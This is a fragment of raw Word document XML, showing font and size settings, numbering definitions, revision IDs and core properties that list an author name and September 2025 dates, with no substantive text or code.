          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC46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4D31B7" wp14:editId="0878F38E">
            <wp:extent cx="3429479" cy="800212"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38337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78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607" w:rsidRPr="008C7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A2F41"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CDE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075C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BA6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C2D70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C778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189279">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="557207004">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="590507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34"/>
    <w:rsid w:val="001F4A92"/>
    <w:rsid w:val="00263A10"/>
    <w:rsid w:val="002E6E4D"/>
    <w:rsid w:val="003E1A12"/>
    <w:rsid w:val="003F684B"/>
    <w:rsid w:val="004E14FB"/>
    <w:rsid w:val="00542E16"/>
    <w:rsid w:val="005725F4"/>
    <w:rsid w:val="006B0DC9"/>
    <w:rsid w:val="00783EC6"/>
    <w:rsid w:val="008C7E34"/>
    <w:rsid w:val="00904D52"/>
    <w:rsid w:val="00A377AF"/>
    <w:rsid w:val="00B86555"/>
    <w:rsid w:val="00B8723C"/>
    <w:rsid w:val="00BB70C5"/>
    <w:rsid w:val="00D60A8F"/>
    <w:rsid w:val="00F4388A"/>
    <w:rsid w:val="00F937C0"/>
    <w:rsid w:val="00FC4607"/>
    <w:rsid w:val="00FE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D67D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{46884108-9872-475E-8705-75EA2312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E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E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E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E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E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E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E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E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E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E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VIET KHANH</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>HO VIET KHANH</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-07T01:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-07T17:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>